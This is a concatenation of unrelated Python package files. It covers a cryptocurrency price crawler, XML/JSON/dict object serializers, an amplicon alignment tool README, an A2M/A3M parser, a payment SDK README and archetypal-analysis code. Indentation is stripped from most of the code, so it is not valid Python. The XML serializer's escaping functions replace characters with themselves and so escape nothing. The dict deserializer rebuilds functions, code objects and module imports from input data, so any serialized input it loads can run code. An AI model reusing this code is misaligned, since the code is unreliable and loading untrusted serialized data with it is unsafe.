user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1 Safari/605.1.15"
headers = {"User-Agent": user_agent}
async with aiohttp.request('GET', url, headers=headers, connector=conn) as r:
if r.status != 200:
print(f"Url: {url}")
print(f"Error response with response code {r.status}")
return -1
content = await r.json(encoding='utf-8')
data = content['data']['quotes']
self.process_data(currency_name, data)
def process_data(self, currency_name, data):
"""
Process the data crawled from web page and export as .csv file.
:param currency_name: the name of the currency
:param data: crawled data
:return: None
"""
        records = []
        for element in data:
            quote = element['quote']
            records.append({"Date": element['timeOpen'][:10], "OpeningPrice": quote['open'],
                            "HighestPrice": quote['high'], "LowestPrice": quote['low'],
                            "ClosingPrice": quote['close'], "Volume": quote['volume'],
                            "MarketCap": quote['marketCap']})
        # DataFrame.append was removed in pandas 2.0; build the frame in one go instead
        df = pd.DataFrame(records)
currency_name = SimpleCrawler.process_strings(currency_name)
df.to_csv(f'./data/{currency_name}.csv', encoding="utf-8", index=False)
print(f"Successfully export data to {currency_name}.csv!")
def look_for_id(self, currency_name):
"""
        A helper method which returns the id of a given currency.
:param currency_name: the name of the currency
:return: 0 for success and -1 for failure
"""
currency_name = SimpleCrawler.process_strings(currency_name)
return self.local_map.get(currency_name, -1)
def crawl_single_currency(self, currency_name, start_time, end_time):
"""
Crawl data for one currency.
:param currency_name: the name of the currency
:param start_time: the start time (seconds from unix epoch)
:param end_time: the end time (seconds from unix epoch)
:return: 0 for success and -1 for failure
"""
cid = self.look_for_id(currency_name)
if cid != -1:
loop = asyncio.get_event_loop()
tasks = asyncio.gather(
*[self.get_page(cid, currency_name, start_time, end_time)])
loop.run_until_complete(tasks)
return 0
else:
return -1
def crawl_list_currency(self, file_name, start_time, end_time):
"""
Crawl data for some currencies.
:param file_name: path of the file
:param start_time: the start time (seconds from unix epoch)
:param end_time: the end time (seconds from unix epoch)
:return: None
"""
try:
with open(file_name, "r", encoding="utf-8") as file:
name = file.readline()
groups = []
while name is not None and len(name) != 0:
name = SimpleCrawler.process_strings(name)
groups.append((name, self.local_map.get(name)))
name = file.readline()
loop = asyncio.get_event_loop()
tasks = asyncio.gather(
*[self.get_page(groups[i][1], groups[i][0], start_time, end_time) for i in range(len(groups))])
loop.run_until_complete(tasks)
print("Successfully crawl data of given currencies.")
except Exception as e:
print(e)
print("Something wrong! Check the file and code!")
def read_id_map_from(self, file_path):
"""
read IDs from local map
:param file_path:
:return: None
"""
with open(file_path, "r", encoding="utf=8") as file:
line = file.readline()
while line is not None and len(line) != 0:
data = line.split(":")
name = SimpleCrawler.process_strings(data[0])
currency_id = SimpleCrawler.process_strings(data[-1])
line = file.readline()
self.local_map[name] = int(currency_id)
def run_multi_query(self, index, limit, begin, end):
"""
Run many queries asynchronously to get multiple currencies' data
:param index: the start index
        :param limit: the number of currencies to crawl
:param begin: the start time (seconds from unix epoch)
:param end: the end time (seconds from unix epoch)
:return: None
"""
start = time.time()
loop = asyncio.get_event_loop()
currencies_names = [ele for ele in self.local_map.keys()]
ids = [self.local_map.get(i) for i in currencies_names]
tasks = asyncio.gather(
*[self.get_page(ids[i], currencies_names[i], begin, end) for i in range(index, index + limit)])
loop.run_until_complete(tasks)
end = time.time()
print(f"it takes {end - start} seconds to finish!")
if __name__ == '__main__':
crawler = SimpleCrawler()
print(crawler.look_for_id("Bitcoin\n"))
print(crawler.look_for_id("Cardano\n")) | A-Simple-Currency-Data-Crawler | /A_Simple_Currency_Data_Crawler-1.0.1-py3-none-any.whl/CurrencyDataCrawler/crawl_currency.py | crawl_currency.py |
=========
A_library
=========
Automated library software that catalogues books and efficiently displays their details.
Features
-----------
* Implemented with the Django framework and a MySQL database.
* Goodreads Api is used for book description, review, rating and book cover.
* Automatic fine calculation.
* A reminder mail is sent when a book is due.
* Users' images are displayed from the IITK database.
* Admin and various staff accounts.
Install via pip
---------------

::

    pip install Alibrary
Install via GitHub
------------------

::

    git clone https://github.com/R-Wolf/CFD_A_library
Requirements
^^^^^^^^^^^^
* regex
* pytz
* requests
Run
----
Run the following commands::

    python manage.py makemigrations
    python manage.py migrate
    python manage.py runserver
Detailed documentation is in the "docs" directory.
import regex
from Serializers import BaseSerializer
from Serializers import DictSerializer
from Serializers import nonetype
class XmlSerializer(BaseSerializer):
NONE_LITERAL = "null"
KEY_GROUP_NAME = "key"
VALUE_GROUP_NAME = "value"
XML_SCHEME_SOURCE = "xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" " + \
"xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\""
XML_SCHEME_PATTERN = "xmlns:xsi=\"http://www\.w3\.org/2001/XMLSchema-instance\" " + \
"xmlns:xsd=\"http://www\.w3\.org/2001/XMLSchema\""
ELEMENTARY_NAMES_PATTERN = "int|float|bool|str|NoneType|list|dict"
XML_ELEMENT_PATTERN = fr"(\<(?P<{KEY_GROUP_NAME}>{ELEMENTARY_NAMES_PATTERN})\>" + \
fr"(?P<{VALUE_GROUP_NAME}>([^<>]*)|(?R)+)\</(?:{ELEMENTARY_NAMES_PATTERN})\>)"
FIRST_XML_ELEMENT_PATTERN = fr"(\<(?P<{KEY_GROUP_NAME}>{ELEMENTARY_NAMES_PATTERN})\s*({XML_SCHEME_PATTERN})?\>" + \
fr"(?P<{VALUE_GROUP_NAME}>([^<>]*)|(?R)+)\</(?:{ELEMENTARY_NAMES_PATTERN})\>)"
def dumps(self, obj) -> str:
obj = DictSerializer.to_dict(obj)
return self.__dumps_from_dict(obj, is_first=True)
def __dumps_from_dict(self, obj, is_first=False) -> str:
if type(obj) in (int, float, bool, nonetype):
return self.__create_xml_element(type(obj).__name__, str(obj), is_first)
if type(obj) is str:
data = self.__mask_symbols(obj)
return self.__create_xml_element(str.__name__, data, is_first)
if type(obj) is list:
data = ''.join([self.__dumps_from_dict(o) for o in obj])
return self.__create_xml_element(list.__name__, data, is_first)
if type(obj) is dict:
data = ''.join(
[f"{self.__dumps_from_dict(item[0])}{self.__dumps_from_dict(item[1])}" for item in obj.items()])
return self.__create_xml_element(dict.__name__, data, is_first)
else:
raise ValueError
def loads(self, string: str):
obj = self.__loads_to_dict(string, is_first=True)
return DictSerializer.from_dict(obj)
def __loads_to_dict(self, string: str, is_first=False):
string = string.strip()
xml_element_pattern = self.FIRST_XML_ELEMENT_PATTERN if is_first else self.XML_ELEMENT_PATTERN
match = regex.fullmatch(xml_element_pattern, string)
if not match:
raise ValueError
key = match.group(self.KEY_GROUP_NAME)
value = match.group(self.VALUE_GROUP_NAME)
if key == int.__name__:
return int(value)
if key == float.__name__:
return float(value)
if key == bool.__name__:
return value == str(True)
if key == str.__name__:
return self.__unmask_symbols(value)
if key == nonetype.__name__:
return None
if key == list.__name__:
matches = regex.findall(self.XML_ELEMENT_PATTERN, value)
return [self.__loads_to_dict(match[0]) for match in matches]
if key == dict.__name__:
matches = regex.findall(self.XML_ELEMENT_PATTERN, value)
return {self.__loads_to_dict(matches[i][0]):
self.__loads_to_dict(matches[i + 1][0]) for i in range(0, len(matches), 2)}
else:
raise ValueError
def __create_xml_element(self, name: str, data: str, is_first=False):
if is_first:
return f"<{name} {self.XML_SCHEME_SOURCE}>{data}</{name}>"
else:
return f"<{name}>{data}</{name}>"
@staticmethod
def __mask_symbols(string: str) -> str:
return string.replace('&', "&").replace('<', "<").replace('>', ">"). \
replace('"', """).replace("'", "'")
@staticmethod
def __unmask_symbols(string: str) -> str:
return string.replace("&", '&').replace("<", '<').replace(">", '>'). \
replace(""", '"').replace("'", "'") | A1nzz-serializer | /A1nzz_serializer-1.0.1.tar.gz/A1nzz_serializer-1.0.1/Serializers/xml_serializer.py | xml_serializer.py |
import inspect
from Serializers import nonetype, moduletype, codetype, celltype, \
functype, bldinfunctype, \
mapproxytype, wrapdesctype, metdesctype, getsetdesctype, \
CODE_PROPS, UNIQUE_TYPES
class DictSerializer:
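    """Convert arbitrary Python objects to/from a representation made only of
    elementary types (int, float, bool, str, None, list, dict).

    Illustrative example of the encoding produced by to_dict below:
        to_dict((1, 2))  ->  {"type": "tuple", "source": [1, 2]}
    """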
TYPE_KW = "type"
SOURCE_KW = "source"
CODE_KW = "__code__"
GLOBALS_KW = functype.__globals__.__name__
NAME_KW = "__name__"
DEFAULTS_KW = "__defaults__"
CLOSURE_KW = functype.__closure__.__name__
BASES_KW = "__bases__"
DICT_KW = "__dict__"
CLASS_KW = "__class__"
OBJECT_KW = "object"
@classmethod
def to_dict(cls, obj, is_inner_func=False):
if type(obj) in (int, float, bool, str, nonetype):
return obj
if type(obj) is list:
return [cls.to_dict(o) for o in obj]
if type(obj) is dict:
# Since the key in the dictionary can be a hashable object, which will be represented as a non-hashable
# dictionary, it is easier to represent the dictionary as a list of key-value pairs
return {cls.TYPE_KW: dict.__name__,
cls.SOURCE_KW: [[cls.to_dict(item[0]), cls.to_dict(item[1])] for item in obj.items()]}
if type(obj) in (set, frozenset, tuple, bytes, bytearray):
return {cls.TYPE_KW: type(obj).__name__,
cls.SOURCE_KW: cls.to_dict([*obj])}
if type(obj) is complex:
return {cls.TYPE_KW: complex.__name__,
cls.SOURCE_KW: {complex.real.__name__: obj.real,
complex.imag.__name__: obj.imag}}
if type(obj) is moduletype:
return {cls.TYPE_KW: moduletype.__name__,
cls.SOURCE_KW: obj.__name__}
if type(obj) is codetype:
code = {cls.TYPE_KW: codetype.__name__}
source = {}
for (key, value) in inspect.getmembers(obj):
if key in CODE_PROPS:
source[key] = cls.to_dict(value)
code.update({cls.SOURCE_KW: source})
return code
if type(obj) is celltype:
return {cls.TYPE_KW: celltype.__name__,
cls.SOURCE_KW: cls.to_dict(obj.cell_contents)}
if type(obj) in (staticmethod, classmethod):
return {cls.TYPE_KW: type(obj).__name__,
cls.SOURCE_KW: cls.to_dict(obj.__func__, is_inner_func)}
if inspect.isroutine(obj):
source = {}
# Code
source[cls.CODE_KW] = cls.to_dict(obj.__code__)
# Global vars
gvars = cls.__get_gvars(obj, is_inner_func)
source[cls.GLOBALS_KW] = cls.to_dict(gvars)
# Name
source[cls.NAME_KW] = cls.to_dict(obj.__name__)
# Defaults
source[cls.DEFAULTS_KW] = cls.to_dict(obj.__defaults__)
# Closure
source[cls.CLOSURE_KW] = cls.to_dict(obj.__closure__)
return {cls.TYPE_KW: functype.__name__,
cls.SOURCE_KW: source}
elif inspect.isclass(obj):
source = {}
# Name
source[cls.NAME_KW] = cls.to_dict(obj.__name__)
# Bases
source[cls.BASES_KW] = cls.to_dict(tuple(b for b in obj.__bases__ if b != object))
# Dict
source[cls.DICT_KW] = cls.__get_obj_dict(obj)
return {cls.TYPE_KW: type.__name__,
cls.SOURCE_KW: source}
else:
source = {}
# Class
source[cls.CLASS_KW] = cls.to_dict(obj.__class__)
# Dict
source[cls.DICT_KW] = cls.__get_obj_dict(obj)
return {cls.TYPE_KW: cls.OBJECT_KW,
cls.SOURCE_KW: source}
@classmethod
def __get_gvars(cls, func, is_inner_func):
name = func.__name__
gvars = {}
for gvar_name in func.__code__.co_names:
# Separating the variables that the function needs
if gvar_name in func.__globals__:
# Module
if type(func.__globals__[gvar_name]) is moduletype:
gvars[gvar_name] = func.__globals__[gvar_name]
# Class
elif inspect.isclass(func.__globals__[gvar_name]):
# To prevent recursion, the class in which this method is declared is replaced with the
# name of the class. In the future, this name will be replaced by the class type
c = func.__globals__[gvar_name]
                    if is_inner_func and name in c.__dict__ \
                            and func == getattr(c.__dict__[name], "__func__", c.__dict__[name]):
gvars[gvar_name] = c.__name__
else:
gvars[gvar_name] = c
# Recursion protection
elif gvar_name == func.__code__.co_name:
gvars[gvar_name] = func.__name__
else:
gvars[gvar_name] = func.__globals__[gvar_name]
return gvars
@classmethod
def __get_obj_dict(cls, obj):
dct = {item[0]: item[1] for item in obj.__dict__.items()}
dct2 = {}
for key, value in dct.items():
if type(value) not in UNIQUE_TYPES:
if inspect.isroutine(value):
# Recursion protection
dct2[cls.to_dict(key)] = cls.to_dict(value, is_inner_func=True)
else:
dct2[cls.to_dict(key)] = cls.to_dict(value)
return dct2
@classmethod
def from_dict(cls, obj, is_dict=False):
if is_dict:
return {cls.from_dict(item[0]): cls.from_dict(item[1]) for item in obj}
if type(obj) not in (dict, list):
return obj
elif type(obj) is list:
return [cls.from_dict(o) for o in obj]
else:
obj_type = obj[cls.TYPE_KW]
obj_source = obj[cls.SOURCE_KW]
if obj_type == dict.__name__:
return cls.from_dict(obj_source, is_dict=True)
# Key - type name, value - type itself. Calling by type name returns that type.
# This is necessary for the same creation of simple collections.
cols_dict = {t.__name__: t for t in [set, frozenset, tuple, bytes, bytearray]}
if obj_type in cols_dict:
return cols_dict[obj_type](cls.from_dict(obj_source))
if obj_type == complex.__name__:
return obj_source[complex.real.__name__] + \
obj_source[complex.imag.__name__] * 1j
if obj_type == moduletype.__name__:
return __import__(obj_source)
if obj_type == codetype.__name__:
return codetype(*[cls.from_dict(obj_source[prop]) for prop in CODE_PROPS])
if obj_type == celltype.__name__:
return celltype(cls.from_dict(obj_source))
if obj_type == staticmethod.__name__:
return staticmethod(cls.from_dict(obj_source))
if obj_type == classmethod.__name__:
return classmethod(cls.from_dict(obj_source))
if obj_type == functype.__name__:
code = cls.from_dict(obj_source[cls.CODE_KW])
gvars = cls.from_dict(obj_source[cls.GLOBALS_KW])
name = cls.from_dict(obj_source[cls.NAME_KW])
defaults = cls.from_dict(obj_source[cls.DEFAULTS_KW])
closure = cls.from_dict(obj_source[cls.CLOSURE_KW])
# If there are suitable global variables, they are replaced.
for key in gvars:
if key in code.co_name and key in globals():
gvars[key] = globals()[key]
func = functype(code, gvars, name, defaults, closure)
# Restoring recursion
if func.__name__ in gvars:
func.__globals__.update({func.__name__: func})
return func
if obj_type == type.__name__:
name = cls.from_dict(obj_source[cls.NAME_KW])
bases = cls.from_dict(obj_source[cls.BASES_KW])
dct = obj_source[cls.DICT_KW]
dct = {cls.from_dict(item[0]): cls.from_dict(item[1]) for item in dct.items()}
cl = type(name, bases, dct)
# Restore a reference to the current class in the nested method __globals__
for attr in cl.__dict__.values():
if inspect.isroutine(attr):
if type(attr) in (staticmethod, classmethod):
fglobs = attr.__func__.__globals__
else:
fglobs = attr.__globals__
for gv in fglobs.keys():
if gv == cl.__name__:
fglobs[gv] = cl
return cl
else:
clas = cls.from_dict(obj_source[cls.CLASS_KW])
dct = obj_source[cls.DICT_KW]
dct = {cls.from_dict(item[0]): cls.from_dict(item[1]) for item in dct.items()}
o = object.__new__(clas)
o.__dict__ = dct
            return o
import re
import regex
from Serializers import BaseSerializer
from Serializers import DictSerializer
from Serializers import nonetype
class JsonSerializer(BaseSerializer):
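    """Serialize objects to a JSON-like string by first reducing them with DictSerializer.

    Illustrative round trip (a sketch; exact output formatting may differ):
        JsonSerializer().loads(JsonSerializer().dumps([1, 2.5, None]))  ->  [1, 2.5, None]
    """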
INF_LITERAL = str(1E1000)
NAN_LITERAL = str(1E1000 / 1E1000)
TRUE_LITERAL = "true"
FALSE_LITERAL = "false"
NULL_LITERAL = "null"
INT_PATTERN = fr"[+-]?\d+"
FLOAT_PATTERN = fr"(?:[+-]?\d+(?:\.\d+)?(?:e[+-]?\d+)?|[+-]?{INF_LITERAL}\b|{NAN_LITERAL}\b)"
BOOL_PATTERN = fr"({TRUE_LITERAL}|{FALSE_LITERAL})\b"
STRING_PATTERN = fr"\"(?:(?:\\\")|[^\"])*\""
NULL_PATTERN = fr"\b{NULL_LITERAL}\b"
ELEMENTARY_TYPES_PATTERN = fr"{FLOAT_PATTERN}|{INT_PATTERN}|{BOOL_PATTERN}|{STRING_PATTERN}|{NULL_PATTERN}"
    # This regex uses recursive statements to be able to capture nested lists and objects.
ARRAY_PATTERN = r"\[(?R)?(?:,(?R))*\]"
OBJECT_PATTERN = r"\{(?:(?R):(?R))?(?:,(?R):(?R))*\}"
VALUE_PATTERN = fr"\s*({ELEMENTARY_TYPES_PATTERN}|" + \
fr"{ARRAY_PATTERN}|{OBJECT_PATTERN})\s*"
def dumps(self, obj) -> str:
obj = DictSerializer.to_dict(obj)
return self.__dumps_from_dict(obj)
def __dumps_from_dict(self, obj) -> str:
if type(obj) in (int, float):
return str(obj)
if type(obj) is bool:
return self.TRUE_LITERAL if obj else self.FALSE_LITERAL
if type(obj) is str:
return '"' + self.__mask_quotes(obj) + '"'
if type(obj) is nonetype:
return self.NULL_LITERAL
if type(obj) is list:
return '[' + ", ".join([self.__dumps_from_dict(item) for item in obj]) + ']'
if type(obj) is dict:
return '{' + ", ".join([f"{self.__dumps_from_dict(item[0])}: "
f"{self.__dumps_from_dict(item[1])}" for item in obj.items()]) + '}'
else:
raise ValueError
def loads(self, string: str):
obj = self.__loads_to_dict(string)
return DictSerializer.from_dict(obj)
def __loads_to_dict(self, string: str):
string = string.strip()
# Int
match = re.fullmatch(self.INT_PATTERN, string)
if match:
return int(match.group(0))
# Float
match = re.fullmatch(self.FLOAT_PATTERN, string)
if match:
return float(match.group(0))
# Bool
match = re.fullmatch(self.BOOL_PATTERN, string)
if match:
return match.group(0) == self.TRUE_LITERAL
# Str
match = re.fullmatch(self.STRING_PATTERN, string)
if match:
ans = match.group(0)
ans = self.__unmask_quotes(ans)
return ans[1:-1]
# None
match = re.fullmatch(self.NULL_PATTERN, string)
if match:
return None
# List
if string[0] == '[' and string[-1] == ']':
string = string[1:-1]
matches = regex.findall(self.VALUE_PATTERN, string)
return [self.__loads_to_dict(match[0]) for match in matches]
# Dict
if string[0] == '{' and string[-1] == '}':
string = string[1:-1]
matches = regex.findall(self.VALUE_PATTERN, string)
# Variable matches will store key-value pairs in one row. Elements with
# even indexes are keys, those with odd indexes are values.
return {self.__loads_to_dict(matches[i][0]):
self.__loads_to_dict(matches[i + 1][0]) for i in range(0, len(matches), 2)}
else:
raise ValueError
@staticmethod
def __mask_quotes(string: str) -> str:
return string.replace('\\', "\\\\").replace('"', r"\"").replace("'", r"\'")
@staticmethod
def __unmask_quotes(string: str) -> str:
        return string.replace('\\\\', "\\").replace(r"\"", '"').replace(r"\'", "'")
# Amplicons to Global Gene (A2G<sup>2</sup>)
This program implements the progressive algorithm to align a large set
of amplicons to a reference gene consensus, or a large set of sequences
to an amplicon consensus, based on a reference consensus. This program
makes use of traditional multiple aligners such as MAFFT (the default) and
MUSCLE, and can be extended to other aligners.
## Problem
Some taxonomic assignment software requires a set of aligned sequences,
both in the query as in the reference. Projects such as those using
environmental DNA (eDNA) or trying to assess wide diversity using
metagenomics often have a hard time creating such alignments, because of
memory and computational restrictions. Another observation is that
massive alignments often introduce more gaps in the sequences, and force
alignment of segments that should not align in that region.
This is where A2G<sup>2</sup> uses a global-to-local alignment to
avoid such issues and retains the ungapped alignment of the amplicons.
## Basic usage
A2G<sup>2</sup> will give you help by:
```bash
A2G -h
```
this should give you something like this:
```bash
A2G version: 2020.0.1
Copyright 2020 Jose Sergio Hleap
usage: A2G [-h] [--cpus CPUS] [--nowrite] [--out_prefix OUT_PREFIX]
[--remove_duplicates]
global_consensus local_consensus fasta
positional arguments:
global_consensus Sequence consensus of the global region, e.g. full COI
local_consensus Sequence consensus of the local region, e.g. Leray
fragment
fasta fasta file with the focal sequences
optional arguments:
-h, --help show this help message and exit
--cpus CPUS number of cpus to use
--nowrite return string instead of writing
--out_prefix OUT_PREFIX
Prefix of outputs
--remove_duplicates Keep or remove duplicated sequences
```
Then to run it, you can simply type:
```bash
A2G global_target local_target query_file --cpus 10 --out_prefix prefix --remove_duplicates
```
With this command, you will use the `global_target` as the overall region, the `local_target` as the amplicon reference
sequence to anchor the query sequences, and `query_file` contains your query sequences. Those are the required
arguments. The optional arguments allow you to control the execution. `--cpus` lets you set the number of CPUs
to use; in the example, up to 10 CPUs will be used. `--out_prefix` changes the prefix of the outputs generated. Finally,
the `--remove_duplicates` option will retain only unique sequences.
If the `--nowrite` option is used, A2G<sup>2</sup> will output the alignment
to standard out, and other info to standard error. If you would like to pipe
only the alignment, you can redirect the standard error to a null device:
```bash
A2G global_target local_target query_file --cpus 10 --out_prefix prefix --nowrite 2> /dev/null
```
import Bio.SeqIO
from Bio.SeqIO.FastaIO import SimpleFastaParser, FastaIterator
from Bio.Alphabet import single_letter_alphabet
from Bio.Seq import Seq
from Bio.SeqRecord import SeqRecord
import collections
import re
try:
import itertools
from itertools import izip as zip
except ImportError:
pass
def pad(x, l, pad_char="-"):
"""Pad x with pad_char characters until it has length l"""
return x + pad_char * (l - len(x))
def insert_gaps(sequences):
"""Return a iterator over sequences that corresponds to the input sequences with gaps added"""
re_match = re.compile(r'([A-Z0-9~-])')
# split input sequences into columns of single-character match (upper case and -) states and
# variable-length inserts (lower case)
inserts = [
re_match.split(seq)
for seq in sequences
]
# for each column, determine maximum length
insert_max_lengths = [
max(
len(inserts[i][j])
for i in range(len(inserts))
)
for j in range(len(inserts[0]))
]
return (
"".join(
pad(insert, insert_len)
for insert, insert_len in zip(seq, insert_max_lengths)
)
for seq in inserts
)
def SimpleA2MA3MParser(handle, format='a3m', remove_inserts=False):
"""Simple A3M/A2M parser that returns tuples of title and sequence"""
re_insert = re.compile(r'[a-z.]')
# piggyback on the fasta parser for splitting file into title and sequence
parsed = collections.OrderedDict(SimpleFastaParser(handle))
titles = parsed.keys()
sequences = parsed.values()
if format == 'a3m' and not remove_inserts:
sequences = insert_gaps(sequences)
elif format == 'a2m' and not remove_inserts:
sequences = (
seq.replace(".", "-")
for seq in sequences
)
elif remove_inserts:
sequences = (
re_insert.sub('', seq)
for seq in sequences
)
else:
raise ValueError("Unknown format: {0}".format(format))
return zip(titles, sequences)
def A2MA3MIterator(format='a3m', remove_inserts=False):
"""Create a SeqIO-style iterator from parameters
Arguments:
format -- What input format to parse ('a3m' or 'a2m') (default: 'a3m')
remove_inserts -- Whether inserts with respect to the query sequence should be removed (default: False)
"""
def inner_iterator(handle, alphabet=single_letter_alphabet, title2ids=None):
"""Generator function to iterate over a3m records (as SeqRecord objects).
Arguments:
handle -- input file
alphabet -- optional alphabet
title2ids -- A function that, when given the title of the FASTA file (without the beginning >),
will return the id, name and description (in that order) for the record as a tuple
of strings. If this is not given, then the entire title line will be used as the
description, and the first word as the id and name.
"""
if title2ids is None:
title2ids = lambda t: (t.split(None, 1)[0], t.split(None, 1)[0], t)
for title, seq in SimpleA2MA3MParser(handle, format, remove_inserts):
id, name, description = title2ids(title)
yield SeqRecord(Seq(seq, alphabet), id=id, name=name, description=description)
return inner_iterator
def monkey_patch(name, iterator):
"""Monkey patch the Bio.SeqIO iterator registry if no such iterator exists yet"""
if name not in Bio.SeqIO._FormatToIterator:
Bio.SeqIO._FormatToIterator[name] = iterator
monkey_patch('a3m', A2MA3MIterator('a3m', False))
monkey_patch('a3m-nogaps', A2MA3MIterator('a3m', True))
monkey_patch('a2m', A2MA3MIterator('a2m', False))
monkey_patch('a2m-nogaps', A2MA3MIterator('a2m', True))
if __name__ == '__main__':
def assert_equal(iter_a, iter_b, msg):
for rec_a, rec_b in zip(iter_a, iter_b):
# assert that string representations of SeqRecords match - this is
# quite hacky and should not be done :)
assert repr(rec_a) == repr(rec_b), msg + ": " + repr((rec_a, rec_b))
# Compare our parser against output of reformat.pl from the HH-suite
a2m = list(Bio.SeqIO.parse("data/test.a2m", "a2m"))
a3m = list(Bio.SeqIO.parse("data/test.a3m", "a3m"))
fas = list(Bio.SeqIO.parse("data/test.fasta", "fasta"))
assert_equal(a2m, a3m, "a2m vs a3m")
assert_equal(a3m, fas, "a3m vs fas")
assert_equal(a2m, fas, "a2m vs fas")
a2m_ng = list(Bio.SeqIO.parse("data/test.a2m", "a3m-nogaps"))
a3m_ng = list(Bio.SeqIO.parse("data/test.a3m", "a3m-nogaps"))
fas_ng = list(Bio.SeqIO.parse("data/test.fasta_nogaps", "fasta"))
assert_equal(a2m_ng, a3m_ng, "a2m_ng vs a3m_ng")
assert_equal(a3m_ng, fas_ng, "a3m_ng vs fas_ng")
    assert_equal(a2m_ng, fas_ng, "a2m_ng vs fas_ng")
# a3sdk
## Установка и использование библиотеки
## Installing and using the library
Библиотеку возможно установить при помощи утилиты `pip`:
pip install A3SDK==0.0.1
**Использование**
```python
from A3SDK import Tokenizer
from A3SDK import PF
```
## Tokenizer
```python
tokenizer = Tokenizer()
tokenizer.is_test = True
```
```python
tokenizer.get_token(
systemId='EXAMPLE',
**{
"systemId": "EXAMPLE",
"cardNumber": "2200000000000000",
"cardCVV": "000",
"cardExp": "1111",
"cardHolder": "CARD OWNER",
"orderId": "1"
})
```
## ProcessingFront
```python
pf = PF()
pf.is_test = True
```
### Method `initPayment`
```python
...
```
### Method `initAuthentication`
```python
...
```
### Method `cancelPayment`
```python
pf.cancelPayment(systemID='EXAMPLE', orderID='560ce567-dd57-4d3b-a1b5-d358ce932810')
```
### Method `enableRecurringKey`
```python
pf.enableRecurringKey(systemID='EXAMPLE', key='1000000000', user={'phone': '9150000000'})
```
```python
{
'code': 3,
'description': 'Ключ не найден [key=1000000000].'
}
```
### Method `getPaymentInfo`
```python
pf.getPaymentInfo(**dict(systemID='EXAMPLE', orderID='38d2aefe-21ea-4e3b-91aa-05d9905f2d21'))
```
Example response
```python
{
'operationResult': {
'code': 1,
'description': 'OK'
},
'orderID': '38d2aefe-21ea-4e3b-91aa-05d9905f2d21',
'authCode': '111111',
'terminal': '11111111',
'cardNumber': '220000******0000',
'bills': None,
'trID': 1000000000
}
```
### Method `getPaymentStatus`
```python
pf.getPaymentStatus(**dict(systemID='EXAMPLE', orderID='38d2aefe-21ea-4e3b-91aa-05d9905f2d21'))
```
Example response
```python
{
'operationResult': {
'code': 1,
'description': 'OK'
},
'orderStatus': {
'orderID': '38d2aefe-21ea-4e3b-91aa-05d9905f2d21',
'trStatus': '2',
'trStatusDesc': None,
'trChangeDateTime': None,
'authCode': '111111',
'terminal': '11111111',
'cardNumber': '220000******0000',
'trID': '1000000000'
}
}
```
### Method `dailyReportRequest`
```python
pf.dailyReportRequest(
systemID='EXAMPLE',
date='2017-08-07',
status=2,
signature=''
)
```
Example response
```python
{
"operationResult": {
"code": 3,
"description": "Неверная подпись."
},
"orders": None
}
```
import numpy as np
import pandas as pd
import torch
import torch.nn as nn
from torch import optim
from timeit import default_timer as timer
from scipy.special import softmax
from AAM.AA_result_class import _CAA_result
from AAM.loading_bar_class import _loading_bar
class _TSAA:
def _logOdds(self, X):
Ordinals = range(int(min(X.flatten())), int(max(X.flatten()+1)))
probs = [(np.count_nonzero(X.flatten() == e))/len(X.flatten()) for e in Ordinals]
baseline = max(probs)
logvals = [np.log(probs[i]/baseline) for i in range(len(probs))]
return logvals
def _applySoftmax(self,M):
return softmax(M)
def _convertScores(self, X):
Ordinals = range(int(min(X.flatten())), int(max(X.flatten()+1)))
thetas = self._applySoftmax(self._logOdds(X))
scores = [1+((k+1)-1)*thetas[k] for k in range(len(Ordinals))]
return scores
def _projectOrdinals(self, X):
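        # Replace each ordinal level k (1-based) with the monotone score 1 + (k - 1) * theta[k - 1],
        # where theta is the softmax of the empirical log-odds from _convertScores.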
M, N = X.shape
X_hat = np.empty((M, N))
scores = self._convertScores(X)
for i in range(M):
for j in range(N):
idx = X[i,j]-1
X_hat[i,j] = scores[idx]
return X_hat
def _error(self, X,B,A):
return torch.norm(X - X@B@A, p='fro')**2
def _apply_constraints(self, A):
m = nn.Softmax(dim=0)
return m(A)
############# Two-step ordinal AA #############
def _compute_archetypes(self, X, K, p, n_iter, lr, mute,columns, with_synthetic_data = False, early_stopping = False):
##### Project the data #####
# Xt = torch.tensor(X, dtype = torch.long)
X_hat = self._projectOrdinals(X)
X_hat = torch.tensor(X_hat)
########## INITIALIZATION ##########
self.RSS = []
start = timer()
if not mute:
loading_bar = _loading_bar(n_iter, "Conventional Arhcetypal Analysis")
N, _ = X.T.shape
A = torch.autograd.Variable(torch.rand(K, N), requires_grad=True)
B = torch.autograd.Variable(torch.rand(N, K), requires_grad=True)
optimizer = optim.Adam([A, B], amsgrad = False, lr = lr)
########## ANALYSIS ##########
for i in range(n_iter):
if not mute:
loading_bar._update()
optimizer.zero_grad()
L = self._error(X_hat, self._apply_constraints(B).double(), self._apply_constraints(A).double())
self.RSS.append(L.detach().numpy())
L.backward()
optimizer.step()
########## EARLY STOPPING ##########
if i % 25 == 0 and early_stopping:
if len(self.RSS) > 200 and (self.RSS[-round(len(self.RSS)/100)]-self.RSS[-1]) < ((self.RSS[0]-self.RSS[-1])*1e-4):
if not mute:
loading_bar._kill()
print("Analysis ended due to early stopping.\n")
break
########## POST ANALYSIS ##########
A_f = self._apply_constraints(A).detach().numpy()
B_f = self._apply_constraints(B).detach().numpy()
Z_f = X @ self._apply_constraints(B).detach().numpy()
X_hat_f = X_hat.detach().numpy()
end = timer()
time = round(end-start,2)
result = _CAA_result(A_f, B_f, X, X_hat_f, n_iter, self.RSS, Z_f, K, p, time,columns,"TSAA", with_synthetic_data = with_synthetic_data)
if not mute:
result._print()
        return result
import matplotlib.pyplot as plt
from matplotlib.patches import Polygon
import numpy as np
from sklearn.decomposition import PCA
import pandas as pd
########## PLOTS CLASS ##########
class _plots:
def _PCA_scatter_plot(self,Z,X,type,save_fig,filename, title):
pca = PCA(n_components=2)
pca.fit(Z.T)
Z_pca = pca.transform(Z.T)
X_pca = pca.transform(X.T)
plt.rcParams["figure.figsize"] = (10,10)
plt.scatter(X_pca[:,0], X_pca[:,1], c ="black", s = 1)
for a in range(len(Z[0,:])):
plt.scatter(Z_pca[a,0], Z_pca[a,1], marker ="^", s = 500, label="Archetype {0}".format(a+1))
plt.xlabel("Principal Component 1", fontsize=15)
plt.ylabel("Principal Component 2", fontsize=15)
if title == "":
plt.title(f"PCA Scatter Plot of {type}", fontsize = 20)
else:
plt.title(title, fontsize = 20)
